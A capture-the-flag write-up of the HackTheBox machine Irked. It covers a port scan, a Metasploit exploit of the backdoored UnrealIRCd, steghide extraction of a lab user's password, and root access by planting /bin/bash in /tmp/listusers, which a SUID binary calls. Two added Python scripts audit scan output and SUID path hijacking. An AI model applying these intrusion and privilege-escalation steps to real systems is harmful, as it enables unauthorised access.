Basic information

Port scan

A full-port scan is needed; the RPC and IRC ports are not found by the default scan:

$ nmap -sC -sV -p- 10.10.10.117
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-18 13:50 CST
Nmap scan report for 10.10.10.117
Host is up (0.070s latency).
Not shown: 65527 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 37278/tcp status
| 100024 1 44225/tcp6 status
| 100024 1 53183/udp status
|_ 100024 1 55149/udp6 status
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
10134/tcp filtered unknown
37278/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1384.51 seconds
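To make the point about the default scan concrete, here is an added example (not part of the original writeup) that parses nmap's normal output and cross-checks the ports announced in the rpcinfo table against what the scan actually reported as open. The sample input is a trimmed copy of the scan above; the regexes and function names are my own and assume nmap's normal (non-XML) output layout.

```python
import re
from typing import Dict, List, Set, Tuple

# Trimmed copy of the scan output above, used as sample input.
SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 37278/tcp status
| 100024 1 53183/udp status
|_ 100024 1 55149/udp6 status
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
10134/tcp filtered unknown
37278/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
"""

# "22/tcp open ssh OpenSSH ..." -> port, proto, state, service, version
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# "| 100024 1 37278/tcp status" -> program, port, proto, service
RPC_LINE = re.compile(r"^\|_?\s*(\d+)\s+[\d,]+\s+(\d+)/(\w+)\s+(\S+)")


def parse_ports(scan: str) -> List[Tuple[int, str, str, str, str]]:
    """Return (port, proto, state, service, version) for every port line."""
    ports = []
    for line in scan.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            ports.append((int(m.group(1)), m.group(2), m.group(3), m.group(4), m.group(5)))
    return ports


def open_ports(scan: str) -> Dict[str, Set[int]]:
    """Open ports grouped by protocol; filtered/closed ports are excluded."""
    result: Dict[str, Set[int]] = {}
    for port, proto, state, _service, _version in parse_ports(scan):
        if state == "open":
            result.setdefault(proto, set()).add(port)
    return result


def rpc_announced(scan: str) -> List[Tuple[int, str, str]]:
    """(port, proto, service) for every entry in the rpcinfo table."""
    found = []
    for line in scan.splitlines():
        m = RPC_LINE.match(line.strip())
        if m:
            found.append((int(m.group(2)), m.group(3), m.group(4)))
    return found


def rpc_ports_not_in_scan(scan: str) -> List[Tuple[int, str, str]]:
    """RPC endpoints the portmapper advertises that this scan never reported open.

    A TCP-only -p- scan will not touch the UDP endpoints, so they show up here
    and need a separate scan (or a firewall rule) to be accounted for.
    """
    opened = open_ports(scan)
    return [(p, proto, svc) for p, proto, svc in rpc_announced(scan)
            if p not in opened.get(proto, set())]


if __name__ == "__main__":
    print("open:", open_ports(SAMPLE_SCAN))
    print("advertised by rpcbind but not in scan:", rpc_ports_not_in_scan(SAMPLE_SCAN))
```

The dynamic status port (37278/tcp) only appears because `-p-` was used; the UDP endpoints in the rpcinfo table are reported here as unscanned, which is the inventory gap a defender wants to close.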

80

Just an image; the page content also points to an IRC service:

8067

The IRC service port; connecting with a client shows it is Unreal 3.2.8.1:

irssi -c 10.10.10.117 --port 8067

UnrealIRCd

A search turns up the related vulnerability:

exploit

One click with msf:

python -c "import pty;pty.spawn('/bin/bash')"

Information gathering

In the /home/djmardov/Documents directory there is a .backup file that gives the steg backup password:

UPupDOWNdownLRlrBAbaSSss

steghide

Given the information so far, the only thing likely to carry a steganographic payload is the image on port 80; extracting it yields a pass.txt:

wget http://10.10.10.117/irked.jpg
steghide extract -p UPupDOWNdownLRlrBAbaSSss -sf irked.jpg
➜  Irked cat pass.txt
Kab6h+m+bbp2J:HG

user flag

The extracted password is the password of user djmardov; log in over ssh and user.txt is in the Documents directory:

Privilege escalation information

A basic SUID check finds /usr/bin/viewuser:

find / -type f -perm -4000 2>/dev/null

Running it shows that it internally calls /tmp/listusers:

That makes it simple: /tmp/listusers is under our control, so arbitrary commands can be executed.
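The root cause here is a SUID binary that hard-codes a path inside a world-writable directory. As an added example (my own code, not from the writeup), here is a small audit that pulls absolute paths out of a binary's bytes and checks each one for the condition that made viewuser exploitable: the file is missing from a directory anyone can write to, is itself world-writable, or sits in a world-writable directory without the sticky bit. The blob and the demo directory are constructed so the script runs offline; on a real host you would feed it the output of the `find` above and the bytes of each SUID file.

```python
import os
import re
import stat
import tempfile
from typing import Dict, List, Optional

# Constructed stand-in for the printable strings of a SUID binary; a real audit
# would use open(path, "rb").read() on each file found by find / -perm -4000.
SAMPLE_BLOB = b"\x7fELF\x00setuid\x00/tmp/listusers\x00/bin/sh\x00system\x00"

# Absolute-path-looking strings embedded in the binary.
ABS_PATH = re.compile(rb"/[A-Za-z0-9_./-]+")


def extract_paths(blob: bytes) -> List[str]:
    """Return every absolute path string found in the binary, in order."""
    return [m.group(0).decode() for m in ABS_PATH.finditer(blob)]


def referenced_path_risk(path: str) -> Optional[str]:
    """Explain why a path a privileged program executes could be hijacked, or None."""
    parent = os.path.dirname(path) or "/"
    try:
        pst = os.stat(parent)
    except FileNotFoundError:
        return None  # parent directory does not exist; nothing to judge
    parent_world_writable = bool(pst.st_mode & stat.S_IWOTH)
    parent_sticky = bool(pst.st_mode & stat.S_ISVTX)

    if not os.path.exists(path):
        # The sticky bit does not help: it only protects files that already exist.
        if parent_world_writable:
            return "missing file in a world-writable directory: any user can create it"
        return None

    fst = os.stat(path)
    if fst.st_mode & stat.S_IWOTH:
        return "file is world-writable"
    if parent_world_writable and not parent_sticky:
        return "parent directory is world-writable without the sticky bit: file can be replaced"
    return None


def audit_suid_blob(blob: bytes) -> Dict[str, Optional[str]]:
    """Map each path referenced by the binary to its risk description (None = fine)."""
    return {p: referenced_path_risk(p) for p in extract_paths(blob)}


def audit_demo() -> Dict[str, Optional[str]]:
    """Run the audit against a freshly created world-writable directory instead of /tmp."""
    demo_dir = tempfile.mkdtemp()
    os.chmod(demo_dir, 0o777)  # world-writable, no sticky bit, like a careless /tmp
    target = os.path.join(demo_dir, "listusers").encode()
    return audit_suid_blob(SAMPLE_BLOB.replace(b"/tmp/listusers", target))


if __name__ == "__main__":
    for path, risk in audit_demo().items():
        print(f"{path}: {risk or 'ok'}")
```

The fix on the defending side follows from the check: a privileged helper should execute only paths under root-owned, non-world-writable directories, and the SUID bit should be dropped from anything that cannot meet that.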

Privilege escalation && root flag

Just call /bin/bash directly:

/tmp/listusers

/bin/bash

References